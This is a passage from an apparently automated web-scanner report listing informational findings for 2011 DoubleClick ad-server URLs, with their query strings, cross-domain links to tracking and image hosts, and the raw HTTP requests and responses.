Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N447.153730.YAHOO.COM/B5548365.27

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27;sz=200x33;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15m0okhml/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307974270/L=vcx0o2KL8NLm3NorTdAdCwCprcHW8031_l4AAICn/B=s_tdK2KL5Qc-/J=1307967070074870/K=ju0TtYgygB_MfId5n0HJ.Q/A=6407512/R=0/*;ord=0.5297442865557969?

The response contains the following links to other domains:

http://global.ard.yahoo.com/SIG=15m0okhml/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307974270/L=vcx0o2KL8NLm3NorTdAdCwCprcHW8031_l4AAICn/B=s_tdK2KL5Qc-/J=1307967070074870/K=ju0TtYgygB_MfId5n0HJ.Q/A=6407512/R=0/*http:/ad.doubleclick.net/click;h=v8/3b25/4/ef/%2a/x;241858033;0-0;0;64369825;3011-200/33;42374177/42391964/1;;~sscs=%3fhttp://www.travelocity.com?WA1=03010&WA2=241858033&WA3=64369825&WA4=42374177&WA5=2995783&WA6=1093499
http://s0.2mdn.net/viewad/2995783/200x33.jpg

Request

GET /adi/N447.153730.YAHOO.COM/B5548365.27;sz=200x33;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15m0okhml/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307974270/L=vcx0o2KL8NLm3NorTdAdCwCprcHW8031_l4AAICn/B=s_tdK2KL5Qc-/J=1307967070074870/K=ju0TtYgygB_MfId5n0HJ.Q/A=6407512/R=0/*;ord=0.5297442865557969? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 590
Date: Mon, 13 Jun 2011 12:11:10 GMT

<a target="_blank" href="http://global.ard.yahoo.com/SIG=15m0okhml/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307974270/L=vcx0o2KL8NLm3NorTdAdCwCprcHW8031_l4AAICn/B=s_tdK2KL5Qc-/J=1307967070074870/K=ju0TtYgygB_MfId5n0HJ.Q/A=6407512/R=0/*http://ad.doubleclick.net/click;h=v8/3b25/4/ef/%2a/x;241858033;0-0;0;64369825;3011-200/33;42374177/42391964/1;;~sscs=%3fhttp://www.travelocity.com?WA1=03010&WA2=241858033&WA3=64369825&WA4=42374177&WA5=2995783&WA6=1093499"><img src="http://s0.2mdn.net/viewad/2995783/200x33.jpg" border=0 alt="Click here to find out more!"></a>

18.28. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.Glam/B5345813.2

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N553.Glam/B5345813.2;sz=160x600;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0400-_urlenc%3D1-_gclickid%3Dgaclk4df5f10acf0e4-_advid%3D1716153-_adid%3D5000036879-_crid%3D500026091-_aipid%3D201106130402-_ge_%3D1%5E2%5E701ae041616bed1e532882927ec42ed01-ord%3D6583043232094496-afid%3D1000212071-dsid%3D864279-sz%3D160x600-zone%3D%2F-sid%3D115232130551023312111-tile%3D1-seq%3D1-tt%3Dj-atf%3D0-url%3D002479-flg%3D64-u%3Db0011468bes1sscjtvi%2Cf0f02sa%2Cg10001s-_gclick_gaclk4df5f10acf0e4;ord=4df5f10acdd5f?

The response contains the following links to other domains:

http://s0.2mdn.net/666472/amex_mr_amazon_160x600.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N553.Glam/B5345813.2;sz=160x600;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0400-_urlenc%3D1-_gclickid%3Dgaclk4df5f10acf0e4-_advid%3D1716153-_adid%3D5000036879-_crid%3D500026091-_aipid%3D201106130402-_ge_%3D1%5E2%5E701ae041616bed1e532882927ec42ed01-ord%3D6583043232094496-afid%3D1000212071-dsid%3D864279-sz%3D160x600-zone%3D%2F-sid%3D115232130551023312111-tile%3D1-seq%3D1-tt%3Dj-atf%3D0-url%3D002479-flg%3D64-u%3Db0011468bes1sscjtvi%2Cf0f02sa%2Cg10001s-_gclick_gaclk4df5f10acf0e4;ord=4df5f10acdd5f? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7534
Date: Mon, 13 Jun 2011 11:14:19 GMT



<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
rve.com/r%3Ba%3Dp-54O-h3cYFO1Zc%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.amazon.com/gp/shopwithpoints/marketing.html/ref%3Dswp_AMEXOS10%3Fpr%3Dswpamex%26inc%3Dswpamex%26plattr%3DAMEXOS10"><img src="http://s0.2mdn.net/666472/amex_mr_amazon_160x600.jpg" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

18.29. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.expedia.com/B5280302.8

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8;sz=728x90;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU_RmJ3mqStj69rmqrG8obc1aWF.hnZW8sdXNhLHQsMTMwNzk2NDMyNDU4NixjLDM0MzMxNixwYyw3NjUxNyxhYywxNjgyNzcsbyxOMC1TMCxsLDYxNDA2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVrb1cucjRjZEVmYjJYWWpGNVpzNTN0R296UzFuWlc4c2RYTmhMSFFzTVRNd056azJORE15TXpNeU1peGpMRE0wTXpjeE1TeHdZeXc0TVRnMk1DeGhZeXd4TnprNU16TXNieXhPTUMxVE1DeHNMRFkyTVRNeUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUzNaQkxXRnVPVTVzUW5sZllYbEVSMjkyUW1SNUxXWTRYMVpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RGUldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVc5blZVSkJaMVZEUVZGUlFVRkJRVUZFYUhock9HZEJRVUZCUVM0dlkyNWtQU0UzVVZKNlMwRnBOWFZCVlZGNVMyOWlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmhWeTB0Ymw5UU1WUmFWSE5GTkcxSGJHZG1hV3hsVTNSRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZMYmt0SWVqTjBhVkEzUWtFbWJuVnRQVEVtYzJsblBVRkhhVmR4ZEhoVmFHbHhaVWxpYmkwd1dYRnRPWE0wZG1SQ2NuVkRTRTVRV2xFbVkyeHBaVzUwUFdOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=;ord=1762201346?

The response contains the following links to other domains:

http://beacon.dmsinsights.com/beacon/1103771/2
http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=5280302&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=62166116&advid=666472&sid=93127&adid=
http://edge.quantserve.com/quant.js
http://l.betrad.com/ct/0_0_0_0_0_1151/pixel.gif?e=100&v=noscript
http://pixel.quantserve.com/pixel/p-54O-h3cYFO1Zc.gif?media=ad&labels=_imp.adserver.doubleclick,_imp.publisher.62166116,_imp.placement.239707455,_imp.creative.42418091
http://s0.2mdn.net/666472/SWD_R2R_FreeWS_728x90.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 13908
Set-Cookie: id=c32d4c33800005f||t=1307964456|et=730|cs=0refygag; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:27:36 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:27:36 GMT
Date: Mon, 13 Jun 2011 11:27:36 GMT
Expires: Mon, 13 Jun 2011 11:27:36 GMT
Cache-Control: private, max-age=300

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
QjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=http://www201.americanexpress.com/getthecard/learn-about/Starwood-Preferred/Starwood/20760?extlink=db-gabmd-2011Starwood-AcqOLA"><img src="http://s0.2mdn.net/666472/SWD_R2R_FreeWS_728x90.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a></noscript>

<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=5280302&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=62166116&advid=666472&sid=93127&adid='></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-54O-h3cYFO1Zc.gif?media=ad&labels=_imp.adserver.doubleclick,_imp.publisher.62166116,_imp.placement.239707455,_imp.creative.42418091" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_1151/pixel.gif?e=100&v=noscript"/></noscript>

<script src="http://beacon.dmsinsights.com/beacon/1103771/2" type="text/javascript"></script>
...[SNIP]...

18.30. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.expedia.com/B5280302.8

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8;sz=728x90;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUKG9NRNq_WCC483at.0o81DY1odtnZW8sdXNhLHQsMTMwNzk2NDMyODU1MyxjLDM0MzMxNixwYyw3NjUxNyxhYywxNjgyNzcsbyxOMC1TMCxsLDYxNDA2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVYRmNSRXpfUFlHMkl5RDRxd0FRRnlmNWs4VlZuWlc4c2RYTmhMSFFzTVRNd056azJORE15TnpFek5TeGpMRE0wTXpjeE1TeHdZeXc0TVRnMk1DeGhZeXd4TnprNU16TXNieXhPTUMxVE1DeHNMRFkyTVRNeUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVFdKRFFWRldiM05VV1UxZllYbEVSMjkyUW1SNUxXazRYMVpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RGUldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVRGNFFVSkJaMVZEUVZGUlFVRkJRVUZQUW5KSFVtZEJRVUZCUVM0dlkyNWtQU0UzVVZKNlMwRnBOWFZCVlZGNVMyOWlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSnRZM295YjNaUU1WUlpiVTVNU1haMGJGRm1iamMzZWpKRFpHWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFVm5RV0ZMYmt0SWVqTjBhVkEzUWtFbWJuVnRQVEVtYzJsblBVRkhhVmR4ZEhwa1VGUnNOMjVJVUU5NWVUQk1NSHB5VkMxVWIzUlJRblJGVjNjbVkyeHBaVzUwUFdOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=;ord=321405452?

The response contains the following links to other domains:

http://beacon.dmsinsights.com/beacon/1103771/2
http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=5280302&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=62166116&advid=666472&sid=93127&adid=
http://edge.quantserve.com/quant.js
http://l.betrad.com/ct/0_0_0_0_0_1151/pixel.gif?e=100&v=noscript
http://pixel.quantserve.com/pixel/p-54O-h3cYFO1Zc.gif?media=ad&labels=_imp.adserver.doubleclick,_imp.publisher.62166116,_imp.placement.239707455,_imp.creative.41583034
http://s0.2mdn.net/666472/SWD_R2R_NoLimit_728x90.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N553.expedia.com/B5280302.8;sz=728x90;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUKG9NRNq_WCC483at.0o81DY1odtnZW8sdXNhLHQsMTMwNzk2NDMyODU1MyxjLDM0MzMxNixwYyw3NjUxNyxhYywxNjgyNzcsbyxOMC1TMCxsLDYxNDA2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVYRmNSRXpfUFlHMkl5RDRxd0FRRnlmNWs4VlZuWlc4c2RYTmhMSFFzTVRNd056azJORE15TnpFek5TeGpMRE0wTXpjeE1TeHdZeXc0TVRnMk1DeGhZeXd4TnprNU16TXNieXhPTUMxVE1DeHNMRFkyTVRNeUxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVFdKRFFWRldiM05VV1UxZllYbEVSMjkyUW1SNUxXazRYMVpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RGUldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVRGNFFVSkJaMVZEUVZGUlFVRkJRVUZQUW5KSFVtZEJRVUZCUVM0dlkyNWtQU0UzVVZKNlMwRnBOWFZCVlZGNVMyOWlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSnRZM295YjNaUU1WUlpiVTVNU1haMGJGRm1iamMzZWpKRFpHWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFVm5RV0ZMYmt0SWVqTjBhVkEzUWtFbWJuVnRQVEVtYzJsblBVRkhhVmR4ZEhwa1VGUnNOMjVJVUU5NWVUQk1NSHB5VkMxVWIzUlJRblJGVjNjbVkyeHBaVzUwUFdOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=;ord=321405452? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982322&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964318938&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307964318556&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1852423368&ga_fc=1&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895143&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=3167&xpc=Xq1icALNsj&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 14011
Date: Mon, 13 Jun 2011 11:25:30 GMT
Expires: Mon, 13 Jun 2011 11:30:30 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>

<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
QjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=http://www201.americanexpress.com/getthecard/learn-about/Starwood-Preferred/Starwood/20760?extlink=db-gabmd-2011Starwood-AcqOLA"><img src="http://s0.2mdn.net/666472/SWD_R2R_NoLimit_728x90.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a></noscript>

<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=5280302&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=62166116&advid=666472&sid=93127&adid='></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-54O-h3cYFO1Zc.gif?media=ad&labels=_imp.adserver.doubleclick,_imp.publisher.62166116,_imp.placement.239707455,_imp.creative.41583034" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_1151/pixel.gif?e=100&v=noscript"/></noscript>

<script src="http://beacon.dmsinsights.com/beacon/1103771/2" type="text/javascript"></script>
...[SNIP]...

18.31. http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6090.218.9105273493621/B5528573.7

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7;sz=300x250;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUAdiVfk7836FQlS6cCc68tAbj5NNnZW8sdXNhLHQsMTMwNzk2NjQ3MzczNyxjLDM1MzA2MixwYyw3OTk5NSxhYywxNzUyMTIsbyxOMC1TMCxsLDY0NTE4LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVIR3Y2dlNmTmViRmZpc3lUci5wQVl5SG5UbGxuWlc4c2RYTmhMSFFzTVRNd056azJOalEzTWpRM055eGpMRE0xTXpRMU5peHdZeXc0TURRMU5peGhZeXd4TnpZd016SXNieXhPTUMxVE1DeHNMRFkwT1RNMkxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDFoSlgwTTVVMmhqWDNvNVkybzRUREZMUm5wZlVIZEJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUzBSdWExcG9UbFZRWkdkZllYbEVSMjkyUW1SNU9FWmZVRlpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDZEZCM1dVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZEZDBJdFowRjZRekZuUVVsbk9FSkJaMVZEUVZGUlFVRkJRVUZqZVV4clkwRkJRVUZCUVM0dlkyNWtQU0V3WjFkMVRWRnFiaTFuVVZFM1pqUlpSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSXdjVTltUW1aNk1WUmlVM3BDWVhKMGJGRm1VVzlmYW5CRFpHWnhMVTVOUW13MlIxVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTJwTmQwMUlaM2xPVkVKbVdWaFFTVUZSYm1GQlUwSnZaRWhTZDA5cE9IWmtNMlF6VEc1U00xbFhUbkppUjFWMVdUSTVkRXd5YUd4WlYxSnpZVmMxYkdNMVowTnhRVjlCUVdkVVNVRnZXRk42ZDNGdlFYZEliMEUwWjBNMlFVOHhRMUJWUkVGQlFVRjNTVUZITUdKSFdtMXZjVlJxWlZKQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNWFqbGxVa2RTYkdzeVZsbElURXRqZDNOalgwRk9RekJLZFUxQkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=1686381690?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3198017/110112_ms_LVCAAdLandingPageHeroRevision_300x250.jpg

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 2112
Set-Cookie: id=cae12c4380000a9||t=1307966476|et=730|cs=b68kiuvf; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 12:01:16 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 12:01:16 GMT
Date: Mon, 13 Jun 2011 12:01:16 GMT
Expires: Mon, 13 Jun 2011 12:01:16 GMT
Cache-Control: private

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/4/64f/%2a/
...[SNIP]...
lURXRqZDNOalgwRk9RekJLZFUxQkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=http://www.expedia.com/daily/promos/archive/partner/cvb/las_vegas_cva/default.asp"><img src="http://s0.2mdn.net/viewad/3198017/110112_ms_LVCAAdLandingPageHeroRevision_300x250.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

18.32. http://ad.doubleclick.net/adi/amzn.us.audienceextension/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/amzn.us.audienceextension/

Issue detail

The page was loaded from a URL containing a query string:

